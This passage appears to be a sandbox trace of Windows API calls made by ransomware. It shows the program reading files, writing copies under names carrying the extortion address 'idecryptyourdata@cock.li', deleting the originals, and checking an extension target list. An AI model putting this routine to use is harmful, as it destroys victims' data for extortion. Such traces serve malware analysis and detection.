WriteFile (in: hFile=0x2e4, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xf6, lpOverlapped=0x0) returned 1 [0048.010] SetEndOfFile (hFile=0x2e4) returned 1 [0048.010] CloseHandle (hObject=0x2e4) returned 1 [0048.014] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.014] SetEndOfFile (hFile=0x300) returned 1 [0048.015] CloseHandle (hObject=0x300) returned 1 [0048.015] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0048.016] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml")) returned 1 [0048.016] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0048.016] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0048.016] lstrlenW (lpString=".doc") returned 4 [0048.016] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0048.016] lstrlenW (lpString=".docx") returned 5 [0048.016] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0048.016] lstrlenW (lpString=".pdf") returned 4 [0048.016] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0048.016] lstrlenW (lpString=".xls") returned 4 [0048.016] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0048.016] lstrlenW (lpString=".xlsx") returned 5 [0048.016] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0048.016] lstrlenW (lpString=".ppt") returned 4 [0048.016] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0048.016] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0048.016] lstrlenW (lpString=".zip") returned 4 [0048.016] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0048.016] lstrlenW (lpString=".rar") returned 4 [0048.016] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0048.016] lstrlenW (lpString=".bz2") returned 4 [0048.016] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0048.016] lstrlenW (lpString=".7z") returned 3 [0048.017] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0048.017] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0048.017] lstrlenW (lpString=".dbf") returned 4 [0048.017] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0048.017] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0048.017] lstrlenW (lpString=".1cd") returned 4 [0048.017] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0048.017] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0048.017] lstrlenW (lpString=".jpg") returned 4 [0048.017] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0048.017] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0048.017] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0048.017] lstrlenW (lpString=".doc") returned 4 [0048.017] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0048.017] lstrlenW (lpString=".docx") returned 5 [0048.017] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0048.017] lstrlenW (lpString=".pdf") returned 4 [0048.017] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0048.017] lstrlenW (lpString=".xls") returned 4 [0048.017] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0048.017] lstrlenW (lpString=".xlsx") returned 5 [0048.017] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0048.017] lstrlenW (lpString=".ppt") returned 4 [0048.017] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0048.017] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0048.017] lstrlenW (lpString=".zip") returned 4 [0048.017] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0048.017] lstrlenW (lpString=".rar") returned 4 [0048.017] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0048.017] lstrlenW (lpString=".bz2") returned 4 [0048.017] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0048.017] lstrlenW (lpString=".7z") returned 3 [0048.017] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0048.017] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0048.017] lstrlenW (lpString=".dbf") returned 4 [0048.017] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0048.017] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0048.018] lstrlenW (lpString=".1cd") returned 4 [0048.018] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0048.018] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0048.018] lstrlenW (lpString=".jpg") returned 4 [0048.018] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0048.018] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0048.018] lstrlenW (lpString="UiInfo.xml") returned 10 [0048.018] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0048.018] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=39050) returned 1 [0048.018] CloseHandle (hObject=0x300) returned 1 [0048.018] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml")) returned 0x80 [0048.018] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0048.018] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0048.018] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.018] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.018] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0048.020] GetLastError () returned 0x0 [0048.020] ReadFile (in: hFile=0x300, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x988a, lpOverlapped=0x0) returned 1 [0048.113] WriteFile (in: hFile=0x2e4, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x9890, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x9890, lpOverlapped=0x0) returned 1 [0048.114] ReadFile (in: hFile=0x300, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0048.114] WriteFile (in: hFile=0x2e4, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xe8, lpOverlapped=0x0) returned 1 [0048.114] SetEndOfFile (hFile=0x2e4) returned 1 [0048.115] CloseHandle (hObject=0x2e4) returned 1 [0048.116] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.116] SetEndOfFile (hFile=0x300) returned 1 [0048.117] CloseHandle (hObject=0x300) returned 1 [0048.117] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0048.117] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml")) returned 1 [0048.117] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0048.117] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0048.117] lstrlenW (lpString=".doc") returned 4 [0048.117] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0048.117] lstrlenW (lpString=".docx") returned 5 [0048.117] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0048.117] lstrlenW (lpString=".pdf") returned 4 [0048.117] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0048.117] lstrlenW (lpString=".xls") returned 4 [0048.117] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0048.117] lstrlenW (lpString=".xlsx") returned 5 [0048.117] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0048.118] lstrlenW (lpString=".ppt") returned 4 [0048.118] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0048.118] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0048.118] lstrlenW (lpString=".zip") returned 4 [0048.118] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0048.118] lstrlenW (lpString=".rar") returned 4 [0048.118] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0048.118] lstrlenW (lpString=".bz2") returned 4 [0048.118] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0048.118] lstrlenW (lpString=".7z") returned 3 [0048.118] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0048.118] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0048.118] lstrlenW (lpString=".dbf") returned 4 [0048.118] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0048.118] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0048.118] lstrlenW (lpString=".1cd") returned 4 [0048.118] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0048.118] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0048.118] lstrlenW (lpString=".jpg") returned 4 [0048.118] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0048.118] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0048.118] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0048.118] lstrlenW (lpString=".doc") returned 4 [0048.118] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0048.118] lstrlenW (lpString=".docx") returned 5 [0048.118] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0048.118] lstrlenW (lpString=".pdf") returned 4 [0048.118] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0048.118] lstrlenW (lpString=".xls") returned 4 [0048.118] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0048.118] lstrlenW (lpString=".xlsx") returned 5 [0048.118] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0048.118] lstrlenW (lpString=".ppt") returned 4 [0048.118] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0048.119] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0048.119] lstrlenW (lpString=".zip") returned 4 [0048.119] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0048.119] lstrlenW (lpString=".rar") returned 4 [0048.119] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0048.119] lstrlenW (lpString=".bz2") returned 4 [0048.119] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0048.119] lstrlenW (lpString=".7z") returned 3 [0048.119] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0048.119] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0048.119] lstrlenW (lpString=".dbf") returned 4 [0048.119] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0048.119] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0048.119] lstrlenW (lpString=".1cd") returned 4 [0048.119] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0048.119] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0048.119] lstrlenW (lpString=".jpg") returned 4 [0048.119] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0048.119] lstrcmpiW (lpString1=".xsd", lpString2=".bat") returned 1 [0048.119] lstrlenW (lpString="SetupUi.xsd") returned 11 [0048.119] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0048.121] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=30120) returned 1 [0048.121] CloseHandle (hObject=0x300) returned 1 [0048.121] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd")) returned 0x80 [0048.122] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0048.132] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0048.132] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.132] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.132] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0048.133] GetLastError () returned 0x0 [0048.133] ReadFile (in: hFile=0x2dc, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x75a8, lpOverlapped=0x0) returned 1 [0048.178] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x75b0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x75b0, lpOverlapped=0x0) returned 1 [0048.179] ReadFile (in: hFile=0x2dc, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0048.179] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xea, lpOverlapped=0x0) returned 1 [0048.179] SetEndOfFile (hFile=0x2c0) returned 1 [0048.179] CloseHandle (hObject=0x2c0) returned 1 [0048.181] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.181] SetEndOfFile (hFile=0x2dc) returned 1 [0048.182] CloseHandle (hObject=0x2dc) returned 1 [0048.182] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0048.182] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd")) returned 1 [0048.183] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0048.183] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0048.183] lstrlenW (lpString=".doc") returned 4 [0048.183] lstrcmpiW (lpString1=".doc", lpString2=".xsd") returned -1 [0048.183] lstrlenW (lpString=".docx") returned 5 [0048.183] lstrcmpiW (lpString1=".docx", lpString2="i.xsd") returned -1 [0048.183] lstrlenW (lpString=".pdf") returned 4 [0048.183] lstrcmpiW (lpString1=".pdf", lpString2=".xsd") returned -1 [0048.183] lstrlenW (lpString=".xls") returned 4 [0048.183] lstrcmpiW (lpString1=".xls", lpString2=".xsd") returned -1 [0048.183] lstrlenW (lpString=".xlsx") returned 5 [0048.183] lstrcmpiW (lpString1=".xlsx", lpString2="i.xsd") returned -1 [0048.183] lstrlenW (lpString=".ppt") returned 4 [0048.183] lstrcmpiW (lpString1=".ppt", lpString2=".xsd") returned -1 [0048.183] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0048.183] lstrlenW (lpString=".zip") returned 4 [0048.183] lstrcmpiW (lpString1=".zip", lpString2=".xsd") returned 1 [0048.183] lstrlenW (lpString=".rar") returned 4 [0048.183] lstrcmpiW (lpString1=".rar", lpString2=".xsd") returned -1 [0048.183] lstrlenW (lpString=".bz2") returned 4 [0048.183] lstrcmpiW (lpString1=".bz2", lpString2=".xsd") returned -1 [0048.183] lstrlenW (lpString=".7z") returned 3 [0048.183] lstrcmpiW (lpString1=".7z", lpString2="xsd") returned -1 [0048.183] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0048.183] lstrlenW (lpString=".dbf") returned 4 [0048.183] lstrcmpiW (lpString1=".dbf", lpString2=".xsd") returned -1 [0048.183] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0048.183] lstrlenW (lpString=".1cd") returned 4 [0048.184] lstrcmpiW (lpString1=".1cd", lpString2=".xsd") returned -1 [0048.184] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0048.184] lstrlenW (lpString=".jpg") returned 4 [0048.184] lstrcmpiW (lpString1=".jpg", lpString2=".xsd") returned -1 [0048.184] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0048.184] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0048.184] lstrlenW (lpString=".doc") returned 4 [0048.184] lstrcmpiW (lpString1=".doc", lpString2=".xsd") returned -1 [0048.184] lstrlenW (lpString=".docx") returned 5 [0048.184] lstrcmpiW (lpString1=".docx", lpString2="i.xsd") returned -1 [0048.184] lstrlenW (lpString=".pdf") returned 4 [0048.184] lstrcmpiW (lpString1=".pdf", lpString2=".xsd") returned -1 [0048.184] lstrlenW (lpString=".xls") returned 4 [0048.184] lstrcmpiW (lpString1=".xls", lpString2=".xsd") returned -1 [0048.184] lstrlenW (lpString=".xlsx") returned 5 [0048.184] lstrcmpiW (lpString1=".xlsx", lpString2="i.xsd") returned -1 [0048.184] lstrlenW (lpString=".ppt") returned 4 [0048.184] lstrcmpiW (lpString1=".ppt", lpString2=".xsd") returned -1 [0048.184] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0048.184] lstrlenW (lpString=".zip") returned 4 [0048.184] lstrcmpiW (lpString1=".zip", lpString2=".xsd") returned 1 [0048.184] lstrlenW (lpString=".rar") returned 4 [0048.184] lstrcmpiW (lpString1=".rar", lpString2=".xsd") returned -1 [0048.184] lstrlenW (lpString=".bz2") returned 4 [0048.184] lstrcmpiW (lpString1=".bz2", lpString2=".xsd") returned -1 [0048.184] lstrlenW (lpString=".7z") returned 3 [0048.184] lstrcmpiW (lpString1=".7z", lpString2="xsd") returned -1 [0048.184] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0048.184] lstrlenW (lpString=".dbf") returned 4 [0048.185] lstrcmpiW (lpString1=".dbf", lpString2=".xsd") returned -1 [0048.185] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0048.185] lstrlenW (lpString=".1cd") returned 4 [0048.185] lstrcmpiW (lpString1=".1cd", lpString2=".xsd") returned -1 [0048.185] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0048.185] lstrlenW (lpString=".jpg") returned 4 [0048.185] lstrcmpiW (lpString1=".jpg", lpString2=".xsd") returned -1 [0048.185] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0048.185] lstrlenW (lpString="Strings.xml") returned 11 [0048.185] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0048.185] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=14084) returned 1 [0048.185] CloseHandle (hObject=0x2dc) returned 1 [0048.185] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml")) returned 0x80 [0048.185] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\strings.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0048.186] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0048.186] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.186] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.186] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\strings.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0048.186] GetLastError () returned 0x0 [0048.186] ReadFile (in: hFile=0x2dc, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x3704, lpOverlapped=0x0) returned 1 [0049.072] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x3710, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x3710, lpOverlapped=0x0) returned 1 [0049.074] ReadFile (in: hFile=0x2dc, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0049.074] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xea, lpOverlapped=0x0) returned 1 [0049.074] SetEndOfFile (hFile=0x2c0) returned 1 [0049.074] CloseHandle (hObject=0x2c0) returned 1 [0049.618] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0049.618] SetEndOfFile (hFile=0x2dc) returned 1 [0049.619] CloseHandle (hObject=0x2dc) returned 1 [0049.619] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0049.629] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml")) returned 1 [0049.629] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0049.629] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0049.629] lstrlenW (lpString=".doc") returned 4 [0049.629] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0049.630] lstrlenW (lpString=".docx") returned 5 [0049.630] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0049.630] lstrlenW (lpString=".pdf") returned 4 [0049.630] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0049.630] lstrlenW (lpString=".xls") returned 4 [0049.630] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0049.630] lstrlenW (lpString=".xlsx") returned 5 [0049.630] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0049.630] lstrlenW (lpString=".ppt") returned 4 [0049.630] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0049.630] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0049.630] lstrlenW (lpString=".zip") returned 4 [0049.630] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0049.630] lstrlenW (lpString=".rar") returned 4 [0049.630] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0049.630] lstrlenW (lpString=".bz2") returned 4 [0049.630] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0049.630] lstrlenW (lpString=".7z") returned 3 [0049.630] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0049.630] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0049.630] lstrlenW (lpString=".dbf") returned 4 [0049.630] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0049.630] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0049.630] lstrlenW (lpString=".1cd") returned 4 [0049.630] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0049.630] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0049.630] lstrlenW (lpString=".jpg") returned 4 [0049.630] lstrcmpiW (lpString1=".jpg", 